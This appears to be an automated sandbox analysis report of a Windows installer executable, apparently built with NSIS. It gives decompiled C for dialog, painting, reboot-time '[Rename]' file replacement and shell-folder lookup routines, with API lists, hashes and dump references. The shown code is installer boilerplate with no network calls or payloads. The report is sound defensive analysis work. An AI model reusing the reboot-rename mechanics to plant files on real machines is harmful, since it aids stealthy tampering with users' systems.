GetDlgItem.USER32 ref: 00404BA4
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
LoadImageA.USER32 ref: 00404C0A
SetWindowLongA.USER32 ref: 00404C24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
SendMessageA.USER32 ref: 00404C60
SendMessageA.USER32 ref: 00404C6C
SendMessageA.USER32 ref: 00404C7C
DeleteObject.GDI32(00000110), ref: 00404C81
SendMessageA.USER32 ref: 00404CAC
SendMessageA.USER32 ref: 00404CB8
SendMessageA.USER32 ref: 00404D52
SendMessageA.USER32 ref: 00404D82

Part of subcall function 004041B0: SendMessageA.USER32 ref: 004041BE

SendMessageA.USER32 ref: 00404D96
GetWindowLongA.USER32 ref: 00404DC4
SetWindowLongA.USER32 ref: 00404DD2
ShowWindow.USER32(?,00000005), ref: 00404DE2
SendMessageA.USER32 ref: 00404EDD
SendMessageA.USER32 ref: 00404F42
SendMessageA.USER32 ref: 00404F57
SendMessageA.USER32 ref: 00404F7B
SendMessageA.USER32 ref: 00404F9B
ImageList_Destroy.COMCTL32(00000000), ref: 00404FB0
GlobalFree.KERNEL32 ref: 00404FC0
SendMessageA.USER32 ref: 00405039
SendMessageA.USER32 ref: 004050E2
SendMessageA.USER32 ref: 004050F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
ShowWindow.USER32(?,00000000), ref: 00405169
GetDlgItem.USER32 ref: 00405174
ShowWindow.USER32(00000000), ref: 0040517B

Strings

N, xrefs: 00404E1B
M, xrefs: 00404D3A
, xrefs: 00405153

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
								__eflags =  *0x42985c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3c0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E0040458A(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x42985c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x42a068; // 0x60b0e4
					_t25 = _t103 + 0x14; // 0x60b0f8
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404566();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebfc; // 0x60b8d8
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f478;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004042B1;
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E0040417B(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004041B0(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42f434 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x42985c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x42985c = 0;
					return 0;
				}
			}

0x004042f6
0x00404408
0x0040441b
0x00404477
0x00404477
0x0040447b
0x00404541
0x00404548
0x0040454a
0x0040454a
0x0040454a
0x00404550
0x00404550
0x00404553
0x00000000
0x0040455a
0x00404489
0x0040448b
0x0040448e
0x00404495
0x00404497
0x0040449e
0x004044a0
0x004044a3
0x004044a6
0x004044ab
0x004044b1
0x004044b4
0x004044bb
0x004044c9
0x004044e1
0x004044e3
0x004044eb
0x004044fa
0x004044fc
0x004044fc
0x004044bb
0x0040449e
0x004044ff
0x00404506
0x00000000
0x00404508
0x00404508
0x0040450f
0x00000000
0x00000000
0x00404511
0x00404515
0x00404526
0x00404526
0x00404528
0x0040452c
0x0040453a
0x0040453a
0x00000000
0x0040453e
0x00404506
0x00404423
0x00404426
0x00000000
0x00000000
0x0040442e
0x00404434
0x00000000
0x00000000
0x0040443a
0x00404440
0x00404440
0x00404443
0x00404446
0x00000000
0x00000000
0x00404469
0x00404469
0x0040446b
0x0040446d
0x00404472
0x00000000
0x004042fc
0x004042fc
0x004042ff
0x00404304
0x00404306
0x00404315
0x00404315
0x0040431c
0x0040431f
0x00404321
0x00404326
0x0040432f
0x00404335
0x00404341
0x00404344
0x0040434d
0x00404352
0x00404355
0x0040435a
0x00404371
0x00404378
0x0040438b
0x0040438e
0x004043a3
0x004043aa
0x004043af
0x004043b4
0x004043b4
0x004043c3
0x004043d2
0x004043e4
0x004043e9
0x004043f9
0x004043fb
0x00000000
0x00404401

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
GetDlgItem.USER32 ref: 00404385
SendMessageA.USER32 ref: 004043A3
GetSysColor.USER32(?), ref: 004043B4
SendMessageA.USER32 ref: 004043C3
SendMessageA.USER32 ref: 004043D2
lstrlenA.KERNEL32(?), ref: 004043D5
SendMessageA.USER32 ref: 004043E4
SendMessageA.USER32 ref: 004043F9
GetDlgItem.USER32 ref: 0040445B
SendMessageA.USER32 ref: 0040445E
GetDlgItem.USER32 ref: 00404489
SendMessageA.USER32 ref: 004044C9
LoadCursorA.USER32 ref: 004044D8
SetCursor.USER32(00000000), ref: 004044E1
LoadCursorA.USER32 ref: 004044F7
SetCursor.USER32(00000000), ref: 004044FA
SendMessageA.USER32 ref: 00404526
SendMessageA.USER32 ref: 0040453A

Strings

: Completed, xrefs: 004044B4
N, xrefs: 00404477

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Name Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Name Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Name Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Name Setup
API String ID: 941294808-4002928617
Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405d66
0x00405d6f
0x00405d76
0x00405d8a
0x00405db2
0x00405dbd
0x00405dc1
0x00405de1
0x00405de8
0x00405df2
0x00405dff
0x00405e04
0x00405e09
0x00405e0d
0x00405e1c
0x00405e1e
0x00405e2b
0x00405e2f
0x00405eca
0x00000000
0x00405e45
0x00405e52
0x00405e76
0x00405e7a
0x00405e99
0x00405e9d
0x00405e9d
0x00405e9f
0x00405ea8
0x00405eb3
0x00405ebe
0x00405ec4
0x00000000
0x00405ec4
0x00405e7c
0x00405e7f
0x00405e8a
0x00405e86
0x00405e88
0x00405e89
0x00405e89
0x00405e91
0x00405e93
0x00000000
0x00405e93
0x00405e5d
0x00405e63
0x00000000
0x00405e63
0x00405e2f
0x00405e0d
0x00405d8c
0x00405d97
0x00405da0
0x00405da4
0x00000000
0x00000000
0x00405da4
0x00405ed5

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
GetShortPathNameA.KERNEL32 ref: 00405DA0

Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

GetShortPathNameA.KERNEL32 ref: 00405DBD
wsprintfA.USER32 ref: 00405DDB
GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
GlobalFree.KERNEL32 ref: 00405EC4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\yRqHWQ91dT.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Strings

%s=%s, xrefs: 00405DD1
[Rename], xrefs: 00405E45, 00405E57

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD

Uniqueness

Uniqueness Score: -1.00%

Function 0040618A, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x60b8d8
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}

0x0040618a
0x0040618a
0x0040618a
0x00406190
0x00406195
0x00406197
0x004061a6
0x004061a6
0x004061ae
0x004061af
0x004061b0
0x004061b1
0x004061b4
0x004061bc
0x004061be
0x004061d5
0x004061d8
0x004061d8
0x004063af
0x004063af
0x004063b3
0x00000000
0x00000000
0x004061e5
0x004061eb
0x00000000
0x00000000
0x004061f1
0x004061f2
0x004061f5
0x004061f8
0x004063a2
0x004063ac
0x004063ae
0x004063ae
0x004063a4
0x004063a6
0x004063a8
0x004063a9
0x004063a9
0x00000000
0x004063a2
0x004061fe
0x00406202
0x00406212
0x00406219
0x0040621c
0x00406224
0x00406227
0x0040622e
0x0040622f
0x00406232
0x0040634f
0x00406352
0x00406382
0x00406385
0x0040638a
0x0040638e
0x0040638e
0x00406393
0x00406399
0x0040639b
0x00000000
0x0040639b
0x00406354
0x00406357
0x0040636c
0x00406373
0x00406359
0x00406360
0x00406360
0x0040637b
0x0040637e
0x00406347
0x00406348
0x00406348
0x00000000
0x0040637e
0x00406238
0x0040623f
0x00406241
0x00406242
0x0040625c
0x0040625c
0x00406263
0x00406263
0x0040626a
0x0040626e
0x0040626e
0x0040626f
0x00406271
0x004062aa
0x004062ad
0x004062bd
0x004062c0
0x004062c8
0x004062ce
0x004062ce
0x0040632d
0x0040632d
0x0040632f
0x00000000
0x00000000
0x004062d2
0x004062d9
0x004062da
0x004062dc
0x004062f6
0x00406304
0x0040630a
0x0040630c
0x0040632a
0x0040632a
0x0040632a
0x00000000
0x0040632a
0x00406312
0x0040631b
0x0040631e
0x00406324
0x00406328
0x00000000
0x00000000
0x00000000
0x00406328
0x004062de
0x004062e1
0x00000000
0x00000000
0x004062f0
0x004062f2
0x004062f4
0x00000000
0x00000000
0x00000000
0x004062f4
0x00000000
0x0040632d
0x004062b5
0x00000000
0x00406273
0x0040628e
0x00406293
